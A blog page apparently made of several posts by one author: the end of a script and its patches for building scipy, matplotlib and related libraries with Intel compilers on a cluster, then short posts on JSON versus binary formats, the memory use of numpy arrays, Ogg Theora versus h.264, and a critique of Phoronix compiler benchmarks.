# include -fPIC in the fcompiler.
sed -i "s/w90/w90\", \"-fPIC/" numpy/numpy/distutils/fcompiler/intel.py
# and more of that
patch -p0 < numpy-ifort.diff

rm scipy
ln -s scipy-*.*.*/ scipy

patch -p0 < scipy-qhull-icc.diff || exit
patch -p0 < scipy-qhull-icc2.diff || exit

# # unnecessary!
# patch -p0 <<EOF
# --- scipy/scipy/special/cephes/const.c    2009-08-07 01:56:43.000000000 -0400
# +++ scipy/scipy/special/cephes/const.c        2009-08-07 01:57:08.000000000 -0400
# @@ -91,12 +91,12 @@
# double THPIO4 =  2.35619449019234492885;       /* 3*pi/4 */
# double TWOOPI =  6.36619772367581343075535E-1; /* 2/pi */
# #ifdef INFINITIES
# -double INFINITY = 1.0/0.0;  /* 99e999; */
# +double INFINITY = __builtin_inff();
# #else
# double INFINITY =  1.79769313486231570815E308;    /* 2**1024*(1-MACHEP) */
# #endif
# #ifdef NANS
# -double NAN = 1.0/0.0 - 1.0/0.0;
# +double NAN = __builtin_nanf("");
# #else
# double NAN = 0.0;
# #endif
# EOF


# building

# TODO: try again later

cd SuiteSparse

make -j9 -C AMD || exit
make -j9 -C UMFPACK || exit

cd ..

# TODO: build numpy again and make sure it has blas and lapack (and ATLAS?)

cd numpy
python setup.py -v build_src config --compiler=intel build_clib \
    --compiler=intel build_ext --compiler=intel || exit
python setup.py install --prefix=$PYPREFIX || exit
cd ..

# scons and numscons
cd scons-2.0.1
python setup.py -v install --prefix=/home/ws/babenhau/python/ || exit
cd ..

git clone git://github.com/cournape/numscons.git
cd numscons 
python setup.py -v install --prefix=/home/ws/babenhau/python/  || exit
cd ..

# adapt /home/ws/babenhau/python/lib/python2.7/site-packages/numpy/distutils/fcompiler/intel.py by hand to include fPIC for intelem

cd scipy

PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py -v config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../SuiteSparse/UFconfig # no exit, because we do the linking by hand later on.

# one file is C++ :(
icpc -fPIC -I/home/ws/babenhau/python/include/python2.7 -I/home/ws/babenhau/python/lib/python2.7/site-packages/numpy/core/include -I/home/ws/babenhau/python/lib/python2.7/site-packages/numpy/core/include -c scipy/spatial/qhull/src/user.c -o build/temp.linux-x86_64-2.7/scipy/spatial/qhull/src/user.o || exit

# linking by hand

# for x in csr csc coo bsr dia; do
#    icpc -xHost -O3 -fPIC -shared \
#        build/temp.linux-x86_64-2.7/scipy/sparse/sparsetools/${x}_wrap.o \
#        -o build/lib.linux-x86_64-2.7/scipy/sparse/sparsetools/_${x}.so || exit
# done
#icpc -xHost -O3 -fPIC -openmp -shared \
#   build/temp.linux-x86_64-2.7/scipy/interpolate/src/_interpolate.o \
#   -o build/lib.linux-x86_64-2.7/scipy/interpolate/_interpolate.so || exit

# build again with the C++ file already compiled

PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../SuiteSparse/UFconfig || exit

# make sure we have cephes
cd scipy/special
PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../../../ATLAS/ \
    LAPACK=../../../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../../../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py -v config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem build_ext --compiler=intel --fcompiler=intelem \
    -I../../../SuiteSparse/UFconfig
cd ../..

# install
PYTHONPATH=/home/ws/babenhau/python//lib/scons-2.0.1/ ATLAS=../ATLAS/ \
    LAPACK=../lapack-3.3.1/libflapack.a LAPACK_SRC=../lapack-3.3.1 BLAS=../BLAS/libfblas.a \
    F77=ifort f77_opt=ifort python setup.py config --compiler=intel --fcompiler=intelem build_clib \
    --compiler=intel --fcompiler=intelem install --prefix=$PYPREFIX || exit

cd ..

# PyNIO

# netcdf-4

patch -p0 < netcdf-patch1.diff || exit
patch -p0 < netcdf-patch2.diff || exit

cd netcdf-4.1.3

CPPFLAGS="-I/home/ws/babenhau/libbutz/hdf5-1.8.7/include -I/home/ws/babenhau/include" LDFLAGS="-L/home/ws/babenhau/libbutz/hdf5-1.8.7/lib/ -L/home/ws/babenhau/lib -lsz -L/home/ws/babenhau/libbutz/szip-2.1/lib -L/opt/intel/Compiler/11.1/080/lib/intel64/libifcore.a -lifcore" ./configure --prefix=/home/ws/babenhau/ --enable-netcdf-4 --enable-shared || exit

make -j9; make check install -j9 || exit

cd ..

# NetCDF4
cd netCDF4-0.9.7
HAS_SZIP=1 SZIP_PREFIX=/home/ws/babenhau/libbutz/szip-2.1/ HAS_HDF5=1 HDF5_DIR=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_PREFIX=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_includedir=/home/ws/babenhau/libbutz/hdf5-1.8.7/include HDF5_libdir=/home/ws/babenhau/libbutz/hdf5-1.8.7/lib HAS_NETCDF4=1 NETCDF4_PREFIX=/home/ws/babenhau/ python setup.py build_ext --compiler="intel" --fcompiler="intel -fPIC" install --prefix $PYPREFIX
cd ..

# parallel netcdf and hdf5: ~/libbutz/

patch -p0 < pynio-fix-no-grib.diff || exit

cd PyNIO-1.4.1
HAS_SZIP=1 SZIP_PREFIX=/home/ws/babenhau/libbutz/szip-2.1/ HAS_HDF5=1 HDF5_DIR=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_PREFIX=/home/ws/babenhau/libbutz/hdf5-1.8.7 HDF5_includedir=/home/ws/babenhau/libbutz/hdf5-1.8.7/include HDF5_libdir=/home/ws/babenhau/libbutz/hdf5-1.8.7/lib HAS_NETCDF4=1 NETCDF4_PREFIX=/home/ws/babenhau/ python setup.py install --prefix=$PYPREFIX || exit
# TODO: Make sure that the install goes to /home/ws/.., not home/ws/...
cd ..

# satexp_utils.so

f2py -c -m satexp_utils --f77exec=ifort --f90exec=ifort interpolate_levels.F90 || exit

## pyhdf

# recompile hdf with fPIC - grr!
cd hdf-4*/
# Fix configure for compilers with - in the name.
patch -p0 < ../hdf-fix-configure.ac.diff
autoconf
FFLAGS="-ip -O3 -xHost -fPIC -r8" CFLAGS="-ip -O3 -xHost -fPIC" CXXFLAGS="$CFLAGS -I/usr/include/rpc  -DBIG_LONGS -DSWAP" F77=ifort ./configure --prefix=/home/ws/babenhau/ --disable-netcdf --with-szlib=/home/ws/babenhau/libbutz/szip-2.1 # --with-zlib=/home/ws/babenhau/libbutz/zlib-1.2.5 --with-jpeg=/home/ws/babenhau/libbutz/jpeg-8c
# finds zlib and jpeg due to LD_LIBRARY_PATH (hack but works…)
make
make install
cd ..

# build pyhdf
cd pyhdf-0.8.3/
INCLUDE_DIRS="/home/ws/babenhau/include:/home/ws/babenhau/libbutz/szip-2.1/include" LIBRARY_DIRS="/home/ws/babenhau/lib:/home/ws/babenhau/libbutz/szip-2.1/lib" python setup.py build -c intel --fcompiler ifort install --prefix=/home/ws/babenhau/python 
cd ..

## matplotlib

cd matplotlib-1.1.0
patch -p0 < ../matplotlib-add-icc-support.diff
python setup.py build -c intel install --prefix=/home/ws/babenhau/python
cd ..

# GEOS → http://download.osgeo.org/geos/geos-3.3.2.tar.bz2

cd geos*/ 
./configure --prefix=/home/ws/babenhau/
make
make check
make install 
cd ..

# basemap

easy_install --prefix /home/ws/babenhau/python basemap
# fails but should now have all dependencies.

cd basemap-*/

python setup.py build -c intel install --prefix=/home/ws/babenhau/python

cd ..

6 Appendix

6.1 All patches inline

To ease usage and upstreaming of my fixes, I include all the patches below, so you can find them directly in this text instead of having to browse external textfiles.

6.1.1 SuiteSparse-umfpack.diff

--- SuiteSparse/UMFPACK/Lib/GNUmakefile 2009-11-11 21:09:54.000000000 +0100
+++ SuiteSparse/UMFPACK/Lib/GNUmakefile 2011-09-09 14:18:57.000000000 +0200
@@ -9,7 +9,7 @@
 C = $(CC) $(CFLAGS) $(UMFPACK_CONFIG) \
     -I../Include -I../Source -I../../AMD/Include -I../../UFconfig \
     -I../../CCOLAMD/Include -I../../CAMD/Include -I../../CHOLMOD/Include \
-    -I../../metis-4.0/Lib -I../../COLAMD/Include
+    -I../../COLAMD/Include

 #-------------------------------------------------------------------------------
 # source files

6.1.2 SuiteSparse.diff

--- SuiteSparse/UFconfig/UFconfig.mk    2011-09-09 13:14:03.000000000 +0200
+++ SuiteSparse/UFconfig/UFconfig.mk    2011-09-09 13:15:03.000000000 +0200
@@ -33,11 +33,11 @@
 # C compiler and compiler flags:  These will normally not give you optimal
 # performance.  You should select the optimization parameters that are best
 # for your system.  On Linux, use "CFLAGS = -O3 -fexceptions" for example.
-CC = cc
-CFLAGS = -O3 -fexceptions
+CC = icc
+CFLAGS = -O3 -xHost -fPIC -openmp -vec_report=0

 # C++ compiler (also uses CFLAGS)
-CPLUSPLUS = g++
+CPLUSPLUS = icpc

 # ranlib, and ar, for generating libraries
 RANLIB = ranlib
@@ -49,8 +49,8 @@
 MV = mv -f

 # Fortran compiler (not normally required)
-F77 = f77
-F77FLAGS = -O
+F77 = ifort
+F77FLAGS = -O3 -xHost
 F77LIB =

 # C and Fortran libraries
@@ -132,13 +132,13 @@
 # The path is relative to where it is used, in CHOLMOD/Lib, CHOLMOD/MATLAB, etc.
 # You may wish to use an absolute path.  METIS is optional.  Compile
 # CHOLMOD with -DNPARTITION if you do not wish to use METIS.
-METIS_PATH = ../../metis-4.0
-METIS = ../../metis-4.0/libmetis.a
+# METIS_PATH = ../../metis-4.0
+# METIS = ../../metis-4.0/libmetis.a

 # If you use CHOLMOD_CONFIG = -DNPARTITION then you must use the following
 # options:
-# METIS_PATH =
-# METIS =
+METIS_PATH =
+METIS =

 #------------------------------------------------------------------------------
 # UMFPACK configuration:
@@ -194,7 +194,7 @@
 # -DNSUNPERF       for Solaris only.  If defined, do not use the Sun
 #          Performance Library

-CHOLMOD_CONFIG =
+CHOLMOD_CONFIG = -DNPARTITION

 #------------------------------------------------------------------------------
 # SuiteSparseQR configuration:

6.1.3 hdf-fix-configure.ac.diff (fixes a bug but still contains another known bug - see Known Bugs!)

--- configure.ac    2012-03-01 15:00:28.000000000 +0100
+++ configure.ac    2012-03-01 15:00:40.000000000 +0100
@@ -815,7 +815,7 @@
 dnl Report anything stripped as a flag in CFLAGS and 
 dnl only the compiler in CC_VERSION.
 CC_NOFLAGS=`echo $CC | sed 's/ -.*//'`
-CFLAGS_TO_ADD=`echo $CC | grep - | sed 's/.* -/-/'`
+CFLAGS_TO_ADD=`echo $CC | grep \ - | sed 's/.* -/-/'`
 if test -n $CFLAGS_TO_ADD; then
   CFLAGS="$CFLAGS_TO_ADD$CFLAGS"
 fi

6.1.4 lapacke-ifort.diff

--- lapacke/make.intel.old  2011-10-05 13:24:14.000000000 +0200
+++ lapacke/make.intel  2011-10-05 16:17:00.000000000 +0200
@@ -56,7 +56,7 @@
 # Ensure that the libraries have the same data model (LP64/ILP64).
 #
 LAPACKE = lapacke.a
-LIBS = ../../../lapack-3.3.1/lapack_LINUX.a ../../../blas/blas_LINUX.a -lm
+LIBS = /opt/intel/Compiler/11.1/080/lib/intel64/libifcore.a ../../../lapack-3.2.1/lapack.a ../../../lapack-3.2.1/blas.a -lm -ifcore
 #
 #  The archiver and the flag(s) to use when building archive (library)
 #  If your system has no ranlib, set RANLIB = echo.

6.1.5 matplotlib-add-icc-support.diff

diff -r 38c2a32c56ae matplotlib-1.1.0/setup.py
--- a/matplotlib-1.1.0/setup.py Fri Mar 02 12:29:47 2012 +0100
+++ b/matplotlib-1.1.0/setup.py Fri Mar 02 12:30:39 2012 +0100
@@ -31,6 +31,13 @@
 if major==2 and minor1<4 or major<2:
     raise SystemExit("""matplotlib requires Python 2.4 or later.""")

+if "intel" in sys.argv or "icc" in sys.argv:
+    try: # make it compile with the intel compiler
+        from numpy.distutils import intelccompiler
+    except ImportError:
+        print "Compiling with the intel compiler requires numpy."
+        raise
+
 import glob
 from distutils.core import setup
 from setupext import build_agg, build_gtkagg, build_tkagg,\

6.1.6 netcdf-patch1.diff

--- netcdf-4.1.3/fortran/ncfortran.h    2011-07-01 01:22:22.000000000 +0200
+++ netcdf-4.1.3/fortran/ncfortran.h    2011-09-14 14:56:03.000000000 +0200
@@ -658,7 +658,7 @@
  * The following is for f2c-support only.
  */

-#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran)
+#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran) &&!defined(__INTEL_COMPILER)

 /*
  * The f2c(1) utility on BSD/OS and Linux systems adds an additional

6.1.7 netcdf-patch2.diff

--- netcdf-4.1.3/nf_test/fortlib.c  2011-09-14 14:58:47.000000000 +0200
+++ netcdf-4.1.3/nf_test/fortlib.c  2011-09-14 14:58:38.000000000 +0200
@@ -14,7 +14,7 @@
 #include "../fortran/ncfortran.h"


-#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran)
+#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran) &&!defined(__INTEL_COMPILER)
 /*
  * The f2c(1) utility on BSD/OS and Linux systems adds an additional
  * underscore suffix (besides the usual one) to global names that have

6.1.8 numpy-icc.diff

--- numpy/numpy/distutils/intelccompiler.py 2011-09-08 14:14:03.000000000 +0200
+++ numpy/numpy/distutils/intelccompiler.py 2011-09-08 14:20:37.000000000 +0200
@@ -30,11 +30,11 @@
     """ A modified Intel x86_64 compiler compatible with a 64bit gcc built Python.
     """
     compiler_type = 'intelem'
-    cc_exe = 'icc -m64 -fPIC'
+    cc_exe = 'icc -m64 -fPIC -xHost -O3'
     cc_args = "-fPIC"
     def __init__ (self, verbose=0, dry_run=0, force=0):
         UnixCCompiler.__init__ (self, verbose,dry_run, force)
-        self.cc_exe = 'icc -m64 -fPIC'
+        self.cc_exe = 'icc -m64 -fPIC -xHost -O3'
         compiler = self.cc_exe
         self.set_executables(compiler=compiler,
                              compiler_so=compiler,

6.1.9 numpy-icpc.diff

--- numpy-1.6.1/numpy/distutils/intelccompiler.py   2011-10-06 16:55:12.000000000 +0200
+++ numpy-1.6.1/numpy/distutils/intelccompiler.py   2011-10-10 10:26:14.000000000 +0200
@@ -10,11 +10,13 @@
     def __init__ (self, verbose=0, dry_run=0, force=0):
         UnixCCompiler.__init__ (self, verbose,dry_run, force)
         self.cc_exe = 'icc -fPIC'
+   self.cxx_exe = 'icpc -fPIC'
         compiler = self.cc_exe
+   compiler_cxx = self.cxx_exe
         self.set_executables(compiler=compiler,
                              compiler_so=compiler,
-                             compiler_cxx=compiler,
-                             linker_exe=compiler,
+                             compiler_cxx=compiler_cxx,
+                             linker_exe=compiler_cxx,
                              linker_so=compiler + ' -shared')

 class IntelItaniumCCompiler(IntelCCompiler):

6.1.10 numpy-ifort.diff

--- numpy-1.6.1/numpy/distutils/fcompiler/intel.py.old  2011-10-10 17:52:34.000000000 +0200
+++ numpy-1.6.1/numpy/distutils/fcompiler/intel.py  2011-10-10 17:53:51.000000000 +0200
@@ -32,7 +32,7 @@
     executables = {
         'version_cmd'  : None,          # set by update_executables
         'compiler_f77' : [None, "-72", "-w90", "-fPIC", "-w95"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'compiler_fix' : [None, "-FI"],
         'linker_so'    : ["<F90>", "-shared"],
         'archiver'     : ["ar", "-cr"],
@@ -129,7 +129,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None, "-FI", "-w90", "-fPIC", "-w95"],
         'compiler_fix' : [None, "-FI"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : ["ar", "-cr"],
         'ranlib'       : ["ranlib"]
@@ -148,7 +148,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None, "-FI", "-w90", "-fPIC", "-w95"],
         'compiler_fix' : [None, "-FI"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : ["ar", "-cr"],
         'ranlib'       : ["ranlib"]
@@ -180,7 +180,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None,"-FI","-w90", "-fPIC","-w95"],
         'compiler_fix' : [None,"-FI","-4L72","-w"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : [ar_exe, "/verbose", "/OUT:"],
         'ranlib'       : None
@@ -232,7 +232,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None,"-FI","-w90", "-fPIC","-w95"],
         'compiler_fix' : [None,"-FI","-4L72","-w"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>',"-shared"],
         'archiver'     : [ar_exe, "/verbose", "/OUT:"],
         'ranlib'       : None

6.1.11 pynio-fix-no-grib.diff

--- PyNIO-1.4.1/Nio.py  2011-09-14 16:00:13.000000000 +0200
+++ PyNIO-1.4.1/Nio.py  2011-09-14 16:00:18.000000000 +0200
@@ -98,7 +98,7 @@
         if ncarg_dir == None or not os.path.exists(ncarg_dir) \
           or not os.path.exists(os.path.join(ncarg_dir,"lib","ncarg")):
             if not __formats__['grib2']:
-                return None
+                return "" # "", because an env variable has to be a string.
             else:
                 print "No path found to PyNIO/ncarg data directory and no usable NCARG installation found"
                 sys.exit()

6.1.12 scipy-qhull-icc.diff

--- scipy/scipy/spatial/qhull/src/qhull_a.h 2011-02-27 11:57:03.000000000 +0100
+++ scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:42:12.000000000 +0200
@@ -102,13 +102,13 @@
 #elif defined(__MWERKS__) && defined(__INTEL__)
 #   define QHULL_OS_WIN
 #endif
-#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)
-template <typename T>
-inline void qhullUnused(T &x) { (void)x; }
-#  define QHULL_UNUSED(x) qhullUnused(x);
-#else
+/*#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)*/
+/*template <typename T>*/
+/*inline void qhullUnused(T &x) { (void)x; }*/
+/*#  define QHULL_UNUSED(x) qhullUnused(x);*/
+/*#else*/
 #  define QHULL_UNUSED(x) (void)x;
-#endif
+*/#endif*/

 /***** -libqhull.c prototypes (alphabetical after qhull) ********************/

6.1.13 scipy-qhull-icc2.diff

--- scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:43:54.000000000 +0200
+++ scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:45:17.000000000 +0200
@@ -102,13 +102,7 @@
 #elif defined(__MWERKS__) && defined(__INTEL__)
 #   define QHULL_OS_WIN
 #endif
-/*#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)*/
-/*template <typename T>*/
-/*inline void qhullUnused(T &x) { (void)x; }*/
-/*#  define QHULL_UNUSED(x) qhullUnused(x);*/
-/*#else*/
 #  define QHULL_UNUSED(x) (void)x;
-*/#endif*/

 /***** -libqhull.c prototypes (alphabetical after qhull) ********************/

6.1.14 scipy-spatial-lifcore.diff

--- scipy-0.9.0/scipy/spatial/setup.py  2011-10-10 17:11:23.000000000 +0200
+++ scipy-0.9.0/scipy/spatial/setup.py  2011-10-10 17:11:09.000000000 +0200
@@ -22,6 +22,8 @@
                                      get_numpy_include_dirs()],
                        # XXX: GCC dependency!
                        #extra_compiler_args=['-fno-strict-aliasing'],
+                       # XXX intel compiler dependency
+                       extra_compiler_args=['-lifcore'],
                        )

     lapack = dict(get_info('lapack_opt'))

7 Summary

I hope this helps someone out there saving some time - or even better: improving the upstream projects. At least it should be a nice reference for all who need to get scipy working on not-quite-supported architectures.

Happy Hacking!

Footnotes:

1

: Actually I already wanted to publish that script more than a year ago, but time flies and there’s always stuff to do. But at least I now managed to get it done.

Author: Arne Babenhauserheide

Created: 2013-09-26 Do

Emacs 24.3.1 (Org mode 8.0.2)


AttachmentSize
2013-09-26-Do-installing-scipy-and-matplotlib-on-a-bare-cluster-with-the-intel-compiler.org29.2 KB

JSON will bite us badly

JSON, the javascript object notation format, is everywhere nowadays. But there are 3 facts which will challenge its dominance.

  1. CPU cores are not getting much faster.
  2. You can rent VMs per core, and you pay per core.
  3. The network is still getting faster and cheaper, and HTTP/2 reduces the minimum cost per file.

Due to these changes, servers will become CPU bound again, and basic data structures on the web will become much more relevant. But the most efficient parsing of JSON requires guessing the final data structure while reading the data.

Therefore the changing costs will bring a comeback for binary data structures, and WebAssembly will provide efficient parsers and emitters in the clients.
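As a rough illustration of the parsing-cost difference (my own sketch, not from the original article; it uses a flat list of floats, real structured data is messier, and the numbers will vary on your machine):

import json
import struct
import timeit

values = [1.0 / (i + 1) for i in range(1000)]
as_json = json.dumps(values)
as_binary = struct.pack("<%dd" % len(values), *values)

# Decoding the text means guessing types and building objects on the fly;
# the fixed binary layout is read in a single pass.
print(timeit.timeit(lambda: json.loads(as_json), number=1000))
print(timeit.timeit(lambda: struct.unpack("<%dd" % len(values), as_binary), number=1000))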

Look at a typical website and count how much of the dynamic data it uses is structured data. Based on that, I expect that 5 years from now there will be celebrity talks with titles like

Scaling 10x higher with streams of structured data.

(And yes, that tech communication often works like this is a problem.)

If you have deep-rooted doubts, have a look at Towards a JavaScript Binary AST, which convinced me to finally publish this article.

(and parsing JSON is a minefield)

Memory requirement of Python datastructures: numpy array, list of floats and inner array

Easily answering the question: “How much space does this need?”

Intro

We recently had to find out whether a given dataset would be shareable without complex trickery. So we took the easiest road and checked the memory requirements of the datastructure.

If you have such a need, there’s always a first stop: Fire up the interpreter and try it out.

The test

We just created a three dimensional numpy array of floats and then looked at the memory requirement in the system monitor - conveniently bound to CTRL-ESC in KDE. By making the array big enough we can ignore all constant costs and directly get the cost per stored value by dividing the total memory of the process by the number of values.

All our tests are done in Python3.

Numpy

For numpy we just create an array of random values cast to floats:

import numpy as np
a = np.array(np.random.random((100, 100, 10000)), dtype="float")

Also we tested what happens when we use "f4" and "f2" instead of "float" as dtype in numpy.
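For reference, the variants with smaller float types look like this (a small sketch; the article only names the dtypes, so the exact call is my guess, with the same shape as above):

import numpy as np
# 32-bit ("f4") and 16-bit ("f2") floats instead of the default 64-bit "float"
a_f4 = np.array(np.random.random((100, 100, 10000)), dtype="f4")
a_f2 = np.array(np.random.random((100, 100, 10000)), dtype="f2")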

Native lists

For the native lists, we use the same array, but convert it to a list of lists of lists:

import numpy as np
a = [[[float(i) for i in j] for j in k] 
     for k in list(np.array(np.random.random((100, 100, 10000)), dtype="float"))]

Array module

Instead of using the full-blown numpy, we can also turn the inner list into an array.

import array
import numpy as np
a = [[array.array("d", [float(i) for i in j]) for j in k] 
     for k in list(np.array(np.random.random((100, 100, 10000)), dtype="float"))]

The results

With a numpy array we need roughly 8 bytes per float. A native list of floats, however, requires roughly 32 bytes per float. So switching from native Python lists to numpy reduces the required memory per floating point value by a factor of 4.

Using an inner array (via array module) instead of the innermost list provides roughly the same gains.

I would have expected a factor of 3, but the factor of 4 fits CPython's layout: each list entry is an 8-byte pointer to a separate float object, and that float object itself needs 24 bytes (object header plus value).

The details are in the following table.

Table 1: Memory requirement of different ways to store values in Python

                        total memory   per value
list of floats          3216.6 MiB     32.166 Bytes
numpy array of floats    776.7 MiB      7.767 Bytes
np f4                    395.2 MiB      3.95  Bytes
np f2                    283.4 MiB      2.834 Bytes
inner array              779.1 MiB      7.791 Bytes

This test was conducted on a 64 bit system, so floats are equivalent to doubles.
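The roughly 8 bytes per value for the plain float array can also be cross-checked directly from numpy instead of the system monitor; a small sketch (not part of the original test):

import numpy as np

a = np.array(np.random.random((100, 100, 10000)), dtype="float")
print(a.itemsize)         # 8: bytes per float64 value
print(a.nbytes / a.size)  # 8.0: the same, computed from the raw data buffer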

The scipy documentation provides a list of all the possible dtype definitions cast to C-types.

Summary

In Python, large numpy arrays require about a quarter of the memory of a nested list structure with the same data. Using an inner array from the array module instead of the innermost list provides roughly the same gains.

Ogg Theora and h.264 - which video codec as standard for internet-video?

Links:
- Video encoder comparison - a much more thorough comparison than mine

We had a kinda long discussion on identi.ca about Ogg Theora and h.264, and since we lacked a simple comparison method, I hacked up a quick script to test them.

It uses frames from Big Buck Bunny and outputs the files bbb.ogg and bbb.264 (license: cc by).

The ogg file and the h.264 file are attached below (bbb-400bps.ogg and bbb-400bps.264), so you can compare them yourself.

Results

What you can see by comparing both is that h.264 wins in terms of raw image quality at the same bitrate (single pass).

So why am I still strongly in favor of Ogg Theora?

The reason is simple:

Due to the licensing costs of h.264 (a few million per year, due from 2015 onwards), making h.264 the standard for internet video would have the effect that only big companies would be able to make a video-enabled browser - or we would get a kind of video tax for free software: if you want to view internet video with free software, you have to pay for the right to use the x264 library (else the developers couldn't cough up the money to pay for the patent license). And no one but the main developers and huge corporations could distribute the x264 library, because they’d have to pay license fees for that.

And no one could hack on the browser or library and distribute the changed version, so the whole idea of free software would be rendered absurd. It wouldn't matter that all code would be free licensed, since only those with an h.264 patent license could change it.

So this post boils down to a simple message:

“Support !theora against h.264 and #flash [as video codec for the web]. Otherwise only big companies will be able to write video browsers - or we get a h.264 tax on !fs”

Theora's raw quality may still be worse, but the license costs and their implications provide very clear reasons for supporting Theora - which in my view are far more important than raw technical stuff.

The test-script

for k in {0..1}; do
    for i in {0..9}; do
        for j in {0..9}; do
            wget http://media.xiph.org/BBB/BBB-360-png/big_buck_bunny_00$k$i$j.png
        done
    done
done

mplayer -vo yuv4mpeg -ao null -nosound mf://*png -mf fps=50

theora_encoder_example -z 0 --soft-target -V 400 -o bbb.ogg stream.yuv

mencoder stream.yuv -ovc x264 -of rawvideo -o bbb.264 -x264encopts bitrate=400 -aspect 16:9 -nosound -vf scale=640:360,harddup

AttachmentSize
bbb-400bps.ogg212.88 KB
bbb-400bps.264214.39 KB
encode.sh428 Bytes

Phoronix conclusions distort their results, shown with the example of GCC vs. LLVM/Clang On AMD's FX-8350 Vishera

Phoronix recently did a benchmark of GCC vs. LLVM on AMD hardware. Sadly their conclusion did not fit the data they showed. Actually it misrepresented the data so strongly that I decided to speak up here instead of having my comments disappear in their forums. This post was started on 2013-05-14 and got updates when things changed - first for the better, then for the worse.

Update 3 (the last straw, 2013-11-09): In the most recent and most blatant attack by Phoronix on copyleft programs - this time openly targeted at GNU - Michael Larabel directly misrepresented a post from Josh Klint to badmouth GDB (Josh confirmed this1). Josh gave a report of his initial experience with GDB in a Kickstarter Update in which he reported some shortcomings he saw in GDB (of which the major gripe is easily resolved with better documentation2) and concluded with “the limitations of GDB are annoying, but I can deal with it. It's very nice to be able to run and debug our editor on Linux”. Michael Larabel only quoted the conclusion up to “annoying” and abused that to support the claim that game developers (in general) call GDB “crap” and for further badmouthing of GDB. With this he provided the straw which I needed to stop reading Phoronix: Michael Larabel is hostile to copyleft and in particular to GNU and he goes as far as rigging test results3 and misrepresenting words of others to further his agenda. I even donated to Phoronix a few times in the past. I guess I won’t do that again, either. I should have learned from the error of the German Pirates and should have avoided reading media which is controlled by people who want to destroy what I fight for (sustainable free software).
Update 2 (2013-07-06): But the next one went down the drain again… “Of course, LLVM/Clang 3.3 still lacks OpenMP support, so those tests are obviously in favor of GCC.” — I couldn’t find a better way to say that those tests are completely useless while at the same time devaluing OpenMP support as “ignore this result along with all others where GCC wins”…
Update (2013-06-21): The recent report of GCC 4.8 vs. LLVM 3.3 looks much better. Not perfect, but much better.

Taking out the OpenMP benchmarks (where GCC naturally won, because LLVM only processes those tests single-threaded) and the build times (which are irrelevant to the speed of the produced binaries), their benchmark had the following result:

LLVM is slower than GCC by:

  • 10.2% (HMMer)
  • 12.7% (MAFFT)
  • 6.8% (BLAKE2)
  • 9.1% (HIMENO)
  • 42.2% (C-Ray)

With these results (which were clearly visible on their result summary on OpenBenchmarking), Michael Larabel from Phoronix concluded:

» The performance of LLVM/Clang 3.3 for most tests is at least comparable to GCC «

Nobu from their Forums supplied a conclusion which represents the data much better:

» GCC is much faster in anything which uses OpenMP, and moderately faster or equal in anything (except compile times) which doesn't [use OpenMP] «

But Michael from Phoronix did not stop at just ignoring the performance difference between GCC and LLVM. He went on claiming, that

In a few benchmarks LLVM/Clang is faster, particularly when it comes to build times.

And this is blatant reality-distortion which I am very tempted to ascribe to favoritism. LLVM is not “particularly” faster when it comes to build times.

LLVM on AMD FX-8350 Vishera is faster ONLY when it comes to build times!

This was not the first time that I read data-distorting conclusions on Phoronix - and my complaints about that in their forum did not change their actions. So I hope that my post here can help making them aware that deliberately distorting test results is unacceptable.

For my work, compiler performance is actually quite important, because I use programs which run for days or weeks, so 10% runtime reduction can mean saving several days - not counting the cost of using up cluster time.

To fix their blunders, what they would have to do is:

  • Avoiding Benchmarks which only one compiler supports properly (OpenMP).
  • Marking the compile time tests explicitly, so they strongly stand out from the rest, because they measure a completely different parameter than the other tests: Compiler Runtime vs. Performance of the Compiled Binaries.
  • Writing conclusions which actually fit their results.

Their current approach gives a distinct disadvantage to GCC (even for the OpenMP tests, because they convey the notion that if LLVM only had OpenMP, it would be better in everything - which as this test shows is simply false), so the compiler-tests from Phoronix work as covert propaganda against GCC, even in tests where GCC flat-out wins. And I already don’t like open propaganda, but when the propaganda gets masked as objective testing, I actually get angry.

I hope my post here can help move them towards doing proper testing again.

